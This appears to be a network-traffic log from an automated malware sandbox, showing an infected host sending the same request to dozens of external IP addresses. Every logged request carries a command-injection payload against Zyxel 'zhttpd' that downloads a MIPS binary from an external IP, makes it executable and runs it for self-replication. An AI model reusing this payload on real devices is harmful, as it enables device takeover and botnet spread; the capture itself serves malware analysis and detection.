                                                Jan 12, 2024 18:16:13.209745884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1936192.168.2.2338980159.173.156.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209764004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1937192.168.2.2349704221.94.71.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209817886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1938192.168.2.2334794118.15.237.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209839106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1939192.168.2.2349948175.55.140.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209875107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1940192.168.2.233756447.243.85.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209904909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1941192.168.2.2338122124.105.65.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209925890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1942192.168.2.2349456112.28.14.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209949017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1943192.168.2.2353324113.29.103.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.209999084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1944192.168.2.2358448112.193.67.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210021973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1945192.168.2.233686819.201.4.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210057020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1946192.168.2.2352504160.222.188.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210088015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1947192.168.2.2348506104.48.245.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210113049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1948192.168.2.2339276184.44.122.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210143089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1949192.168.2.233894263.94.22.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210189104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1950192.168.2.235511058.117.247.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210216999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1951192.168.2.2346636159.191.76.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210242987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1952192.168.2.2334166126.94.5.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210268021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1953192.168.2.2346136160.129.136.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210313082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1954192.168.2.2336658160.83.179.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210346937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1955192.168.2.234245091.144.37.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210380077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1956192.168.2.233765687.175.128.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210406065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1957192.168.2.2346154144.114.181.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210434914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1958192.168.2.233493243.216.89.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210458994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1959192.168.2.234250660.77.146.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210490942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1960192.168.2.2360526220.208.100.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210522890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1961192.168.2.2343318191.121.255.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210562944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1962192.168.2.234383283.45.216.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210607052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1963192.168.2.234605480.235.142.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210617065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1964192.168.2.2333170132.0.156.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210652113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1965192.168.2.2360836149.69.218.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210685968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1966192.168.2.2355242193.145.235.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210732937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1967192.168.2.233860243.141.49.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210748911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1968192.168.2.2345552134.59.208.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210783958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1969192.168.2.234799841.79.54.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210834980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1970192.168.2.233621699.240.62.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210872889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1971192.168.2.2333004157.127.72.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210895061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1972192.168.2.235898891.251.69.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210927963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1973192.168.2.2360184202.223.15.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.210966110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1974192.168.2.235126646.30.145.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211013079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1975192.168.2.234927045.187.159.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211030006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1976192.168.2.2351256174.247.154.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211051941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1977192.168.2.2356894129.155.151.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211086035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1978192.168.2.233677044.134.140.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211138964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1979192.168.2.234069867.157.166.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211165905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1980192.168.2.2352486113.71.206.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211200953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1981192.168.2.2357792209.235.39.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211225033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1982192.168.2.2340604200.35.41.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211272955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1983192.168.2.234234050.136.232.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211309910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1984192.168.2.235535668.11.252.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211354017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1985192.168.2.235886624.248.175.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211380005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1986192.168.2.233995063.154.241.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211402893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1987192.168.2.2358942132.4.173.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211443901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1988192.168.2.235549614.243.6.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211484909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1989192.168.2.235328489.49.137.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211519003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1990192.168.2.2335966191.120.150.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211549044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1991192.168.2.2341842191.237.252.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211568117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1992192.168.2.2352636199.81.186.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211611032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1993192.168.2.2345162132.111.134.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211637974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1994192.168.2.2359162138.104.20.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211668968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1995192.168.2.235456884.185.54.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211703062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1996192.168.2.235210435.239.115.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211755037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1997192.168.2.233604258.252.191.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211769104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1998192.168.2.2359904164.216.162.16443
                                                TimestampBytes transferredDirectionData
